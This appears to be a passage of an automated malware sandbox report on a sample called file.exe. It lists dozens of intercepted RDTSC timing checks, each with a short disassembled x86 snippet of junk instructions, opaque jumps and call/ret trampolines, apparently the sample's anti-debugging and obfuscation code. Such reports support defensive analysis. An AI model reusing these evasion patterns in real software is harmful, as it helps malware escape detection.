                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C299 second address: A4C2F8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB9C8B8B506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c stc 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FB9C8B8B508h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov bl, FFh 0x0000002b push 00000000h 0x0000002d jno 00007FB9C8B8B515h 0x00000033 xchg eax, esi 0x00000034 js 00007FB9C8B8B50Eh 0x0000003a push eax 0x0000003b jnc 00007FB9C8B8B506h 0x00000041 pop eax 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C2F8 second address: A4C2FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C2FC second address: A4C30D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9C8B8B50Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C30D second address: A4C312 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4E1E5 second address: A4E1EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4E1EB second address: A4E2A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FB9C8D34AF8h 0x0000000e nop 0x0000000f jo 00007FB9C8D34AECh 0x00000015 mov ebx, dword ptr [ebp+122D2561h] 0x0000001b xor dword ptr [ebp+122D19B4h], ebx 0x00000021 push dword ptr fs:[00000000h] 0x00000028 push 00000000h 0x0000002a push edx 0x0000002b call 00007FB9C8D34AE8h 0x00000030 pop edx 0x00000031 mov dword ptr [esp+04h], edx 0x00000035 add dword ptr [esp+04h], 00000016h 0x0000003d inc edx 0x0000003e push edx 0x0000003f ret 0x00000040 pop edx 0x00000041 ret 0x00000042 mov edi, ecx 0x00000044 mov dword ptr fs:[00000000h], esp 0x0000004b mov di, si 0x0000004e mov eax, dword ptr [ebp+122D11EDh] 0x00000054 push 00000000h 0x00000056 push edx 0x00000057 call 00007FB9C8D34AE8h 0x0000005c pop edx 0x0000005d mov dword ptr [esp+04h], edx 0x00000061 add dword ptr [esp+04h], 0000001Ch 0x00000069 inc edx 0x0000006a push edx 0x0000006b ret 0x0000006c pop edx 0x0000006d ret 0x0000006e mov ebx, 2C1A5093h 0x00000073 and edi, dword ptr [ebp+1245C4F8h] 0x00000079 push FFFFFFFFh 0x0000007b jp 00007FB9C8D34AF2h 0x00000081 push eax 0x00000082 jng 00007FB9C8D34AEEh 0x00000088 push edx 0x00000089 push eax 0x0000008a push edx 0x0000008b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50066 second address: A5006B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A04A4F second address: A04A59 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB9C8D34AE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5017E second address: A50188 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FB9C8B8B506h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A54D96 second address: A54DA0 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB9C8D34AE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A54DA0 second address: A54DA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A56079 second address: A56082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A58EC5 second address: A58F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007FB9C8B8B508h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 push 00000000h 0x00000023 pushad 0x00000024 jmp 00007FB9C8B8B512h 0x00000029 pushad 0x0000002a sub dword ptr [ebp+122D1B61h], eax 0x00000030 call 00007FB9C8B8B50Eh 0x00000035 pop ebx 0x00000036 popad 0x00000037 popad 0x00000038 push 00000000h 0x0000003a or edi, dword ptr [ebp+122D1C22h] 0x00000040 xchg eax, esi 0x00000041 pushad 0x00000042 jmp 00007FB9C8B8B516h 0x00000047 jmp 00007FB9C8B8B511h 0x0000004c popad 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 jns 00007FB9C8B8B506h 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A58F5B second address: A58F65 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB9C8D34AE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A58019 second address: A5801D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5AF8B second address: A5AF91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B199 second address: A5B1A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B1A3 second address: A5B1A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B1A7 second address: A5B1AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A627D0 second address: A627EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9C8D34AF6h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A627EC second address: A627F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6711A second address: A67158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FB9C8D34AEBh 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 pushad 0x00000011 pushad 0x00000012 jmp 00007FB9C8D34AF6h 0x00000017 jmp 00007FB9C8D34AEBh 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pop edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67234 second address: A67238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67238 second address: A67287 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9C8C44100h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FB9C8C440FDh 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jmp 00007FB9C8C440FBh 0x00000019 mov eax, dword ptr [eax] 0x0000001b jmp 00007FB9C8C440FDh 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 jng 00007FB9C8C44100h 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6734F second address: A67354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67354 second address: A6735A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6E2CA second address: A6E2CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6E2CE second address: A6E2E9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FB9C8C440FDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jno 00007FB9C8C440F6h 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6E2E9 second address: A6E2FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 jo 00007FB9C8C44CF6h 0x0000000d popad 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6CEAE second address: A6CEB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FB9C8C440F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6D738 second address: A6D781 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9C8C44D09h 0x00000007 jnc 00007FB9C8C44CF6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jc 00007FB9C8C44CF6h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jne 00007FB9C8C44CF6h 0x0000001e popad 0x0000001f push esi 0x00000020 jmp 00007FB9C8C44D03h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6D781 second address: A6D78E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnp 00007FB9C8C440FEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6D78E second address: A6D7AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 jmp 00007FB9C8C44D04h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6D930 second address: A6D942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB9C8C440F6h 0x0000000a je 00007FB9C8C440F6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6DE10 second address: A6DE1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB9C8C44CF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6DE1A second address: A6DE4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop eax 0x0000000c jne 00007FB9C8C440FCh 0x00000012 jbe 00007FB9C8C440F6h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e jmp 00007FB9C8C440FBh 0x00000023 jbe 00007FB9C8C440F6h 0x00000029 popad 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6DE4D second address: A6DE58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB9C8C44CF6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6E14A second address: A6E155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6E155 second address: A6E15B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6E15B second address: A6E167 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FB9C8C440F6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73696 second address: A7369E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7369E second address: A736BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 js 00007FB9C8C440F6h 0x0000000c popad 0x0000000d pop edx 0x0000000e pushad 0x0000000f push eax 0x00000010 jmp 00007FB9C8C440FAh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A736BA second address: A736C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A736C2 second address: A736CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73ACD second address: A73AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73AD3 second address: A73ADD instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB9C8C440F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73ADD second address: A73B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB9C8C44D07h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB9C8C44CFDh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73B09 second address: A73B0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73B0D second address: A73B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB9C8C44CFCh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7406E second address: A74089 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9C8C44101h 0x00000007 js 00007FB9C8C440F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A74089 second address: A740AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FB9C8C44CF6h 0x00000009 jmp 00007FB9C8C44D06h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A74344 second address: A7437D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9C8C440FAh 0x00000007 jp 00007FB9C8C4410Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB9C8C440FCh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A744C2 second address: A744CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A744CB second address: A744D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A744D7 second address: A744DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC351 second address: 9FC36D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9C8C44107h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A74A5B second address: A74A7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9C8C44D07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7336F second address: A73374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73374 second address: A7337C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7337C second address: A73380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73380 second address: A73384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73384 second address: A7338A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A783EC second address: A783F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E530 second address: A3E535 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E8DF second address: A3E912 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9C8C44D05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jbe 00007FB9C8C44D0Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB9C8C44D01h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3EB71 second address: A3EB97 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB9C8C440F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f jmp 00007FB9C8C44106h 0x00000014 pop edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3EB97 second address: A3EBB4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB9C8C44CFCh 0x00000008 jne 00007FB9C8C44CF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jnp 00007FB9C8C44CF6h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F14F second address: A3F19E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007FB9C8C440F8h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 mov ch, dh 0x00000023 mov edi, dword ptr [ebp+122D2AA5h] 0x00000029 push 0000001Eh 0x0000002b cld 0x0000002c nop 0x0000002d push ebx 0x0000002e jg 00007FB9C8C440F8h 0x00000034 pop ebx 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jnl 00007FB9C8C440FCh 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F19E second address: A3F1A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F594 second address: A3F59E instructions: 0x00000000 rdtsc 0x00000002 je 00007FB9C8C440F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F59E second address: A3F606 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9C8C44D09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB9C8C44D01h 0x00000010 pop edx 0x00000011 nop 0x00000012 mov dword ptr [ebp+122D2AF6h], eax 0x00000018 lea eax, dword ptr [ebp+1248006Fh] 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007FB9C8C44CF8h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 0000001Dh 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 push eax 0x00000039 push ecx 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F606 second address: A3F60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F60C second address: A3F67B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007FB9C8C44CF8h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 lea eax, dword ptr [ebp+1248002Bh] 0x00000029 push 00000000h 0x0000002b push ebx 0x0000002c call 00007FB9C8C44CF8h 0x00000031 pop ebx 0x00000032 mov dword ptr [esp+04h], ebx 0x00000036 add dword ptr [esp+04h], 00000014h 0x0000003e inc ebx 0x0000003f push ebx 0x00000040 ret 0x00000041 pop ebx 0x00000042 ret 0x00000043 add cx, D2EBh 0x00000048 jmp 00007FB9C8C44D07h 0x0000004d nop 0x0000004e push eax 0x0000004f push edx 0x00000050 push ebx 0x00000051 pushad 0x00000052 popad 0x00000053 pop ebx 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F67B second address: A3F680 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7FAE6 second address: A7FAEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7FAEA second address: A7FAEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7FAEE second address: A7FAFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FB9C8C44CFEh 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7FD7F second address: A7FD8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9C8C440FBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7FD8E second address: A7FD92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7FD92 second address: A7FDA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB9C8C440FEh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8516E second address: A85175 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A85175 second address: A8517B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8517B second address: A85194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB9C8C44CFCh 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
